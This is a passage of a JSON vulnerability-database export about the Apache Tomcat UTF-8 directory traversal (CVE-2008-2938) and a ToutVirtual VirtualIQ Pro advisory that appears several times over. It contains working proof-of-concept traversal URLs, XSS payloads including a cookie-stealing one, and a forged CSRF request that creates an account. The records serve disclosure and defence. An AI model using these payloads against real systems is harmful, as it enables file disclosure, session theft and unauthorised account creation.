["CVE-2008-2938", "CVE-2006-3835"], "modified": "2009-11-09T00:00:00", "id": "SECURITYVULNS:DOC:22760", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22760", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T18:51:50", "description": "Crossite scripting, information leak.", "edition": 2, "cvss3": {}, "published": "2009-01-28T00:00:00", "type": "securityvulns", "title": "Apache Tomcat multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2009-01-28T00:00:00", "id": "SECURITYVULNS:VULN:9193", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9193", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T21:32:21", "description": "BUGTRAQ ID:30633\r\nCVE ID\uff1aCVE-2008-2938\r\nCNCVE ID\uff1aCNCVE-20082938\r\n\r\nApache Tomcat\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u5f00\u653e\u6e90\u7801\u7684JSP\u5e94\u7528\u670d\u52a1\u5668\u7a0b\u5e8f\u3002\u3002\r\nApache Tomcat\u4e0d\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u8f93\u5165\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5WEB\u670d\u52a1\u7a0b\u5e8f\u4e0a\u4e0b\u6587\u67e5\u770b\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002\r\n\u6b64\u6f0f\u6d1e\u53d1\u751f\u662f\u7531\u4e8eJAVA\u5904\u7406\u8f93\u5165\u5b58\u5728\u95ee\u9898\uff0c\u5982\u679ccontext.xml\u6216server.xml\u5141\u8bb8'allowLinking'\u548c'URIencoding'\u4e3a'UTF-8'\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4ee5WEB\u6743\u9650\u83b7\u5f97\u91cd\u8981\u7684\u7cfb\u7edf\u6587\u4ef6\u5185\u5bb9\u3002\n\nApache Software Foundation Tomcat 6.0.16 \r\nApache Software Foundation Tomcat 6.0.15 \r\nApache Software Foundation Tomcat 6.0.14 \r\nApache Software Foundation Tomcat 6.0.13 \r\nApache Software Foundation Tomcat 6.0.12 \r\nApache Software Foundation Tomcat 6.0.11 \r\nApache Software Foundation Tomcat 6.0.10 \r\nApache Software Foundation Tomcat 6.0.9 \r\nApache Software Foundation Tomcat 6.0.8 \r\nApache Software Foundation Tomcat 6.0.7 \r\nApache Software Foundation Tomcat 6.0.6 \r\nApache Software Foundation Tomcat 6.0.5 \r\nApache Software Foundation Tomcat 6.0.4 \r\nApache Software Foundation Tomcat 6.0.3 \r\nApache Software Foundation Tomcat 6.0.2 \r\nApache Software Foundation Tomcat 6.0.1 \r\nApache Software Foundation Tomcat 6.0 \r\nApache Software Foundation Tomcat 5.5.26 \r\nApache Software Foundation Tomcat 5.5.25 \r\nApache Software Foundation Tomcat 5.5.24 \r\nApache Software Foundation Tomcat 5.5.23 \r\nApache Software Foundation Tomcat 5.5.22 \r\nApache Software Foundation Tomcat 5.5.21 \r\nApache Software Foundation Tomcat 5.5.20 \r\nApache Software Foundation Tomcat 5.5.19 \r\nApache Software Foundation Tomcat 5.5.18 \r\nApache Software Foundation Tomcat 5.5.17 \r\nApache Software Foundation Tomcat 5.5.16 \r\nApache Software Foundation Tomcat 5.5.15 \r\nApache Software Foundation Tomcat 5.5.14 \r\nApache Software Foundation Tomcat 5.5.13 \r\nApache Software Foundation Tomcat 5.5.12 \r\nApache Software Foundation Tomcat 5.5.11 \r\nApache Software Foundation Tomcat 5.5.10 \r\nApache Software Foundation Tomcat 5.5.9 \r\nApache Software Foundation Tomcat 5.5.8 \r\nApache Software Foundation Tomcat 5.5.7 \r\nApache Software Foundation Tomcat 5.5.6 \r\nApache Software Foundation Tomcat 5.5.5 \r\nApache Software Foundation Tomcat 5.5.4 \r\nApache Software Foundation Tomcat 5.5.3 \r\nApache Software Foundation Tomcat 5.5.2 \r\nApache Software Foundation Tomcat 5.5.1 \r\nApache Software Foundation Tomcat 5.5 \r\nApache Software Foundation Tomcat 4.1.37 \r\nApache Software Foundation Tomcat 4.1.36 \r\nApache Software Foundation Tomcat 4.1.36 \r\nApache Software Foundation Tomcat 4.1.34 \r\nApache Software Foundation Tomcat 4.1.34 \r\n+ Gentoo Linux 1.4 _rc3\r\n+ Gentoo Linux 1.4 _rc2\r\n+ Gentoo Linux 1.4 _rc1\r\n+ Gentoo Linux 1.2 \r\nApache Software Foundation Tomcat 4.1.32 \r\nApache Software Foundation Tomcat 4.1.31 \r\nApache Software Foundation Tomcat 4.1.30 \r\nApache Software Foundation Tomcat 4.1.29 \r\nApache Software Foundation Tomcat 4.1.28 \r\nApache Software Foundation Tomcat 4.1.24 \r\n+ Gentoo Linux 1.4 _rc3\r\n+ Gentoo Linux 1.4 _rc2\r\n+ Gentoo Linux 1.4 _rc1\r\n+ Gentoo Linux 1.2 \r\nApache Software Foundation Tomcat 4.1.12 \r\nApache Software Foundation Tomcat 4.1.10 \r\nApache Software Foundation Tomcat 4.1.9 beta\r\nApache Software Foundation Tomcat 4.1.3 beta\r\nApache Software Foundation Tomcat 4.1.3 \r\nApache Software Foundation Tomcat 4.1 \n \u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c6.0.18\uff1a\r\n<a href=http://tomcat.apache.org target=_blank>http://tomcat.apache.org</a>\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\u4e3a\uff1a\r\n\u7981\u7528allowLinking\u6216\u4e0d\u8981\u8bbe\u7f6eURIencoding\u4e3aUTF8\u3002", "cvss3": {}, "published": "2008-08-12T00:00:00", "title": "Apache Tomcat UTF-8\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2008-08-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3822", "id": "SSV:3822", "sourceData": "\n http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-3822", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T15:06:25", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2938"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65645", "id": "SSV:65645", "sourceData": "\n Title: Apache Tomcat Directory Traversal Vulnerability\r\nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)\r\nSeverity: High\r\nImpact: Remote File Disclosure\r\nVulnerable Version: prior to 6.0.18\r\nSolution:\r\n - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)\r\n - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.\r\n - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.\r\nReferences:\r\n - http://tomcat.apache.org/security.html\r\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938\r\nHistory:\r\n - 07.17.2008: Initiate notify (To Apache Security Team)\r\n - 08.02.2008: Responsed this problem fixed and released new version\r\n - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)\r\n - 08.10.2008: Responsed with some suggestions.\r\n\r\nDescription\r\nAs Apache Security Team, this problem occurs because of JAVA side.\r\nIf your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as\r\n'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd)\r\n\r\nExploit\r\nIf your webroot directory has three depth(e.g /usr/local/wwwroot), An\r\nattacker can access arbitrary files as below. (Proof-of-concept)\r\n\r\nhttp://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar\r\n\r\n# milw0rm.com [2008-08-11]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65645", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:14:51", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-3835", "CVE-2008-2938"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67058", "id": "SSV:67058", "sourceData": "\n &redirectSecure Network - Security Research Advisory\r\n\r\nVuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities\r\nSystems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882\r\nSystems not affected: --\r\nSeverity: High\r\nLocal/Remote: Remote\r\nVendor URL: http://www.toutvirtual.com\r\nAuthor(s): Alberto Trivero (a.trivero (at) securenetwork (dot) it [email concealed]) \r\nClaudio Criscione (c.criscione (at) securenetwork (dot) it [email concealed])\r\nVendor disclosure: 02/07/2009\r\nVendor acknowledged: 16/07/2009\r\nVendor patch release: notified us on 06/11/2009\r\nPublic disclosure: 07/11/2009\r\nAdvisory number: SN-2009-02\r\nAdvisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt\r\n\r\n*** SUMMARY ***\r\n\r\nToutVirtual's VirtualIQ Pro is specifically designed for IT administrators \r\nresponsible for managing virtual platforms. VirtualIQ Pro provides\r\nVisibility, Analytics and policy-based Optimization - all from one single\r\nconsole. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type \r\nII hypervisors. VirtualIQ Pro can be used to visualize, analyze and \r\noptimize your choice of virtualization platform - Citrix, Microsoft,\r\nNovell, Oracle and/or VMware.\r\n\r\nMultiple vulnerabilities has been found which a allow an attacker to conduct \r\nvarious XSS and CSRF attack, and other attacks due to the use \r\nof an old an not hardened version of the web server.\r\n\r\n*** VULNERABILITY DETAILS ***\r\n\r\n(a) Cross-site scripting (XSS)\r\n\r\nDue to an improper sanitization of user's input, multiple XSS attacks \r\n(reflective and stored) are possible.\r\nReflective PoCs:\r\n\r\nhttp://server:9080/tvserver/server/user/setPermissions.jsp?userId=1"><sc\r\nript>alert(1)</script>&resultResourceIds=111-222-1933email (at) address (dot) t [email concealed]\r\nst\r\n\r\nhttp://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&a\r\nmp;deptName=%22;alert(1);//&deptId=1&deptDesc=asd\r\n\r\nhttp://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;aler\r\nt(1);//\r\n\r\nhttp://server:9080/tvserver/reports/virtualIQAdminReports.do?command=get\r\nFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E\r\n\r\nStored XSS attacks can be triggered in the "Middle Name" parameter in the \r\n"Edit Profile" page with an HTTP request like the following:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1\r\nHost: server:9080\r\nCookies: JSESSIONID=[...]\r\n\r\nuserName=IQMANAGER&firstName=IQ&middleName=asd'; \r\nalert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&passwo\r\nrd=********&retypePassword=********&redirect=null&passwordModifed=false&\r\nisReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1\r\n\r\n(b) Cross-site request forgery (CSRF)\r\n\r\nAn attacker can perform different types of CSRF attacks against a logged user. \r\nHe can, for example, shutdown, start or restart an arbitrary\r\nvirtual machine, schedule new activities and so on.\r\n\r\nThe following HTTP request, if forged by the attacker and executed by the \r\nvictim while logged on VirtualIQ, creates an arbitrary user:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId= HTTP/1.1\r\nHost: server:9080\r\nCookie: JSESSIONID=[...]\r\n\r\nuserName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40\r\nasd.com&password=asd6&retypePassword=asd6=null&passwordModifed=\r\nfalse&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&location\r\nId=1\r\n\r\n(c) Web server vulnerabilities\r\n\r\nVirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which \r\nmultiple public vulnerabilities have been released. As a \r\nPoC, a directory traversal attack (CVE-2008-2938) \r\ncan be performed as:\r\n\r\nhttp://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml\r\n\r\nListing of an arbitrary directory (CVE-2006-3835) can also be obtained with \r\nthe following PoC:\r\n\r\nhttp://192.168.229.85:9080/tvserver/server/;index.jsp\r\n\r\n(d) Information Leakage\r\n\r\nTomcat status page should be disabled or restricted, being accessible at:\r\n\r\nhttp://status:9080/status\r\n\r\nUsername and password to access a VM through SSH are also available in clear \r\ntext in the configuration page. \r\nSince an XSS vulnerability can also be triggered in the same page, an attacker \r\nwould also be able to easily capture the full credentials to access \r\nthe VM with a specially crafted XSS payload.\r\n\r\n(e) Remote code execution\r\n\r\nJBoss JMX Management Console is exposed and can be used by remote attackers to \r\nexecute arbitrary commands on the system:\r\n\r\nhttp://server:9080/jmx-console/\r\n\r\nJBoss Web Console is exposed as well and can be used by remote attackers to \r\nexecute any command on the system:\r\n\r\nhttp://server:9080/web-console/\r\n\r\n*** EXPLOIT ***\r\n\r\nAttackers may exploit these issues through a common browser as explained \r\nabove.\r\n\r\n*** FIX INFORMATION ***\r\n\r\nUpgrade to the latest version, at the moment 3.5 build 10.14.2009\r\n\r\n*** WORKAROUNDS ***\r\n\r\n--\r\n\r\n*********************\r\n*** LEGAL NOTICES ***\r\n*********************\r\n\r\nSecure Network (www.securenetwork.it) is an information security company, \r\nwhich provides consulting and training services, and engages in security \r\nresearch and development.\r\n\r\nWe are committed to open, full disclosure of vulnerabilities, cooperating\r\nwhenever possible with software developers for properly handling disclosure.\r\n\r\nThis advisory is copyright 2009 Secure Network S.r.l. Permission is \r\nhereby granted for the redistribution of this alert, provided that it is\r\nnot altered except by reformatting it, and that due credit is given. It \r\nmay not be edited in any way without the express consent of Secure Network \r\nS.r.l. Permission is explicitly given for insertion in vulnerability \r\ndatabases and similars, provided that due credit is given to Secure Network.\r\n\r\nThe information in the advisory is believed to be accurate at the time of \r\npublishing based on currently available information. This information is\r\nprovided as-is, as a free service to the community by Secure Network \r\nresearch staff. There are no warranties with regard to this information. \r\nSecure Network does not accept any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\nIf you have any comments or inquiries, or any issue with what is reported \r\nin this advisory, please inform us as soon as possible.\r\n\r\nE-mail: securenetwork (at) securenetwork (dot) it [email concealed]\r\nGPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc\r\nPhone: +39 02 24 12 67 88\r\n\r\n-- \r\nClaudio Criscione\r\n\r\nSecure Network S.r.l.\r\nVia Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia\r\nTel: +39 02.24126788 Mob: +39 392 3389178\r\nemail: c.criscione (at) securenetwork (dot) it [email concealed]\r\nweb: www.securenetwork.it\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67058", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:31:27", "description": "No description provided by source.", "cvss3": {}, "published": "2009-11-07T00:00:00", "type": "seebug", "title": "ToutVirtual VirtualIQ Pro 3.2 Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-3835", "CVE-2008-2938"], "modified": "2009-11-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14334", "id": "SSV:14334", "sourceData": "\n &redirectSecure Network - Security Research Advisory\r\n\r\nVuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities\r\nSystems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882\r\nSystems not affected: --\r\nSeverity: High\r\nLocal/Remote: Remote\r\nVendor URL: http://www.toutvirtual.com\r\nAuthor(s): Alberto Trivero (a.trivero (at) securenetwork (dot) it [email concealed]) \r\nClaudio Criscione (c.criscione (at) securenetwork (dot) it [email concealed])\r\nVendor disclosure: 02/07/2009\r\nVendor acknowledged: 16/07/2009\r\nVendor patch release: notified us on 06/11/2009\r\nPublic disclosure: 07/11/2009\r\nAdvisory number: SN-2009-02\r\nAdvisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt\r\n\r\n*** SUMMARY ***\r\n\r\nToutVirtual's VirtualIQ Pro is specifically designed for IT administrators \r\nresponsible for managing virtual platforms. VirtualIQ Pro provides\r\nVisibility, Analytics and policy-based Optimization - all from one single\r\nconsole. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type \r\nII hypervisors. VirtualIQ Pro can be used to visualize, analyze and \r\noptimize your choice of virtualization platform - Citrix, Microsoft,\r\nNovell, Oracle and/or VMware.\r\n\r\nMultiple vulnerabilities has been found which a allow an attacker to conduct \r\nvarious XSS and CSRF attack, and other attacks due to the use \r\nof an old an not hardened version of the web server.\r\n\r\n*** VULNERABILITY DETAILS ***\r\n\r\n(a) Cross-site scripting (XSS)\r\n\r\nDue to an improper sanitization of user's input, multiple XSS attacks \r\n(reflective and stored) are possible.\r\nReflective PoCs:\r\n\r\nhttp://server:9080/tvserver/server/user/setPermissions.jsp?userId=1"><sc\r\nript>alert(1)</script>&resultResourceIds=111-222-1933email (at) address (dot) t [email concealed]\r\nst\r\n\r\nhttp://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&a\r\nmp;deptName=%22;alert(1);//&deptId=1&deptDesc=asd\r\n\r\nhttp://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;aler\r\nt(1);//\r\n\r\nhttp://server:9080/tvserver/reports/virtualIQAdminReports.do?command=get\r\nFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E\r\n\r\nStored XSS attacks can be triggered in the "Middle Name" parameter in the \r\n"Edit Profile" page with an HTTP request like the following:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1\r\nHost: server:9080\r\nCookies: JSESSIONID=[...]\r\n\r\nuserName=IQMANAGER&firstName=IQ&middleName=asd'; \r\nalert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&passwo\r\nrd=********&retypePassword=********&redirect=null&passwordModifed=false&\r\nisReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1\r\n\r\n(b) Cross-site request forgery (CSRF)\r\n\r\nAn attacker can perform different types of CSRF attacks against a logged user. \r\nHe can, for example, shutdown, start or restart an arbitrary\r\nvirtual machine, schedule new activities and so on.\r\n\r\nThe following HTTP request, if forged by the attacker and executed by the \r\nvictim while logged on VirtualIQ, creates an arbitrary user:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId= HTTP/1.1\r\nHost: server:9080\r\nCookie: JSESSIONID=[...]\r\n\r\nuserName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40\r\nasd.com&password=asd6&retypePassword=asd6=null&passwordModifed=\r\nfalse&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&location\r\nId=1\r\n\r\n(c) Web server vulnerabilities\r\n\r\nVirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which \r\nmultiple public vulnerabilities have been released. As a \r\nPoC, a directory traversal attack (CVE-2008-2938) \r\ncan be performed as:\r\n\r\nhttp://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml\r\n\r\nListing of an arbitrary directory (CVE-2006-3835) can also be obtained with \r\nthe following PoC:\r\n\r\nhttp://192.168.229.85:9080/tvserver/server/;index.jsp\r\n\r\n(d) Information Leakage\r\n\r\nTomcat status page should be disabled or restricted, being accessible at:\r\n\r\nhttp://status:9080/status\r\n\r\nUsername and password to access a VM through SSH are also available in clear \r\ntext in the configuration page. \r\nSince an XSS vulnerability can also be triggered in the same page, an attacker \r\nwould also be able to easily capture the full credentials to access \r\nthe VM with a specially crafted XSS payload.\r\n\r\n(e) Remote code execution\r\n\r\nJBoss JMX Management Console is exposed and can be used by remote attackers to \r\nexecute arbitrary commands on the system:\r\n\r\nhttp://server:9080/jmx-console/\r\n\r\nJBoss Web Console is exposed as well and can be used by remote attackers to \r\nexecute any command on the system:\r\n\r\nhttp://server:9080/web-console/\r\n\r\n*** EXPLOIT ***\r\n\r\nAttackers may exploit these issues through a common browser as explained \r\nabove.\r\n\r\n*** FIX INFORMATION ***\r\n\r\nUpgrade to the latest version, at the moment 3.5 build 10.14.2009\r\n\r\n*** WORKAROUNDS ***\r\n\r\n--\r\n\r\n*********************\r\n*** LEGAL NOTICES ***\r\n*********************\r\n\r\nSecure Network (www.securenetwork.it) is an information security company, \r\nwhich provides consulting and training services, and engages in security \r\nresearch and development.\r\n\r\nWe are committed to open, full disclosure of vulnerabilities, cooperating\r\nwhenever possible with software developers for properly handling disclosure.\r\n\r\nThis advisory is copyright 2009 Secure Network S.r.l. Permission is \r\nhereby granted for the redistribution of this alert, provided that it is\r\nnot altered except by reformatting it, and that due credit is given. It \r\nmay not be edited in any way without the express consent of Secure Network \r\nS.r.l. Permission is explicitly given for insertion in vulnerability \r\ndatabases and similars, provided that due credit is given to Secure Network.\r\n\r\nThe information in the advisory is believed to be accurate at the time of \r\npublishing based on currently available information. This information is\r\nprovided as-is, as a free service to the community by Secure Network \r\nresearch staff. There are no warranties with regard to this information. \r\nSecure Network does not accept any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\nIf you have any comments or inquiries, or any issue with what is reported \r\nin this advisory, please inform us as soon as possible.\r\n\r\nE-mail: securenetwork (at) securenetwork (dot) it [email concealed]\r\nGPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc\r\nPhone: +39 02 24 12 67 88\r\n\r\n-- \r\nClaudio Criscione\r\n\r\nSecure Network S.r.l.\r\nVia Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia\r\nTel: +39 02.24126788 Mob: +39 392 3389178\r\nemail: c.criscione (at) securenetwork (dot) it [email concealed]\r\nweb: www.securenetwork.it\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14334", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:30:53", "description": "No description provided by source.", "cvss3": {}, "published": "2009-11-10T00:00:00", "type": "seebug", "title": "ToutVirtual VirtualIQ Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-3835", "CVE-2008-2938"], "modified": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12603", "id": "SSV:12603", "sourceData": "\n Secure Network - Security Research Advisory\r\n\r\nVuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities\r\nSystems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882\r\nSystems not affected: --\r\nSeverity: High\r\nLocal/Remote: Remote\r\nVendor URL: http://www.toutvirtual.com\r\nAuthor(s): Alberto Trivero (a.trivero@securenetwork.it) \r\nClaudio Criscione (c.criscione@securenetwork.it)\r\nVendor disclosure: 02/07/2009\r\nVendor acknowledged: 16/07/2009\r\nVendor patch release: notified us on 06/11/2009\r\nPublic disclosure: 07/11/2009\r\nAdvisory number: SN-2009-02\r\nAdvisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt\r\n\r\n\r\n*** SUMMARY ***\r\n\r\nToutVirtual's VirtualIQ Pro is specifically designed for IT administrators \r\nresponsible for managing virtual platforms. VirtualIQ Pro provides\r\n Visibility, Analytics and policy-based Optimization - all from one single\r\nconsole. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type \r\nII hypervisors. VirtualIQ Pro can be used to visualize, analyze and \r\noptimize your choice of virtualization platform - Citrix, Microsoft,\r\nNovell, Oracle and/or VMware.\r\n\r\nMultiple vulnerabilities has been found which a allow an attacker to conduct \r\nvarious XSS and CSRF attack, and other attacks due to the use \r\nof an old an not hardened version of the web server.\r\n\r\n\r\n*** VULNERABILITY DETAILS ***\r\n\r\n(a) Cross-site scripting (XSS)\r\n\r\nDue to an improper sanitization of user's input, multiple XSS attacks \r\n(reflective and stored) are possible.\r\nReflective PoCs:\r\n\r\nhttp://server:9080/tvserver/server/user/setPermissions.jsp?userId=1"><script>alert(1)< \\\r\n/script>&amp;resultResourceIds=111-222-1933email@address.tst \r\n\r\nhttp://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&amp;deptName=%2 \\\r\n2;alert(1);//&amp;deptId=1&amp;deptDesc=asd\r\n\r\nhttp://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;alert(1);//\r\n\r\nhttp://server:9080/tvserver/reports/virtualIQAdminReports.do?command=getFilter&amp;rep \\\r\nortName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E\r\n\r\nStored XSS attacks can be triggered in the "Middle Name" parameter in the \r\n"Edit Profile" page with an HTTP request like the following:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1\r\nHost: server:9080\r\nCookies: JSESSIONID=[...]\r\n\r\nuserName=IQMANAGER&firstName=IQ&middleName=asd'; \r\nalert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&password=********&re \\\r\ntypePassword=********&redirect=null&passwordModifed=false&isReportUser=false&roleId=1& \\\r\nsupervisorId=1&departmentId=1&locationId=1\r\n\r\n\r\n(b) Cross-site request forgery (CSRF)\r\n\r\nAn attacker can perform different types of CSRF attacks against a logged user. \r\nHe can, for example, shutdown, start or restart an arbitrary\r\nvirtual machine, schedule new activities and so on.\r\n\r\nThe following HTTP request, if forged by the attacker and executed by the \r\nvictim while logged on VirtualIQ, creates an arbitrary user:\r\n\r\nPOST /tvserver/user/user.do?command=save&userId= HTTP/1.1\r\nHost: server:9080\r\nCookie: JSESSIONID=[...]\r\n\r\nuserName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40asd.com&passwo \\\r\nrd=asd6&retypePassword=asd6&redirect=null&passwordModifed=false&isReportUser=false&rol \\\r\neId=1&supervisorId=1&departmentId=1&locationId=1\r\n\r\n\r\n(c) Web server vulnerabilities\r\n\r\nVirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which \r\nmultiple public vulnerabilities have been released. As a \r\nPoC, a directory traversal attack (CVE-2008-2938) \r\ncan be performed as:\r\n\r\nhttp://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml\r\n\r\nListing of an arbitrary directory (CVE-2006-3835) can also be obtained with \r\nthe following PoC:\r\n\r\nhttp://192.168.229.85:9080/tvserver/server/;index.jsp\r\n\r\n\r\n(d) Information Leakage\r\n\r\nTomcat status page should be disabled or restricted, being accessible at:\r\n\r\nhttp://status:9080/status\r\n\r\nUsername and password to access a VM through SSH are also available in clear \r\ntext in the configuration page. \r\nSince an XSS vulnerability can also be triggered in the same page, an attacker \r\nwould also be able to easily capture the full credentials to access \r\nthe VM with a specially crafted XSS payload.\r\n\r\n(e) Remote code execution\r\n\r\nJBoss JMX Management Console is exposed and can be used by remote attackers to \r\nexecute arbitrary commands on the system:\r\n\r\nhttp://server:9080/jmx-console/\r\n\r\nJBoss Web Console is exposed as well and can be used by remote attackers to \r\nexecute any command on the system:\r\n\r\nhttp://server:9080/web-console/\r\n\r\n\r\n*** EXPLOIT ***\r\n\r\nAttackers may exploit these issues through a common browser as explained \r\nabove.\r\n\r\n\r\n*** FIX INFORMATION ***\r\n\r\nUpgrade to the latest version, at the moment 3.5 build 10.14.2009\r\n\r\n*** WORKAROUNDS ***\r\n\r\n--\r\n\r\n\r\n*********************\r\n*** LEGAL NOTICES ***\r\n*********************\r\n\r\nSecure Network (www.securenetwork.it) is an information security company, \r\nwhich provides consulting and training services, and engages in security \r\nresearch and development. \r\n\r\nWe are committed to open, full disclosure of vulnerabilities, cooperating\r\nwhenever possible with software developers for properly handling disclosure.\r\n\r\nThis advisory is copyright 2009 Secure Network S.r.l. Permission is \r\nhereby granted for the redistribution of this alert, provided that it is\r\nnot altered except by reformatting it, and that due credit is given. It \r\nmay not be edited in any way without the express consent of Secure Network \r\nS.r.l. Permission is explicitly given for insertion in vulnerability \r\ndatabases and similars, provided that due credit is given to Secure Network.\r\n\r\nThe information in the advisory is believed to be accurate at the time of \r\npublishing based on currently available information. This information is\r\nprovided as-is, as a free service to the community by Secure Network \r\nresearch staff. There are no warranties with regard to this information. \r\nSecure Network does not accept any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\nIf you have any comments or inquiries, or any issue with what is reported \r\nin this advisory, please inform us as soon as possible.\r\n\r\nE-mail: securenetwork@securenetwork.it\r\nGPG/PGP key: 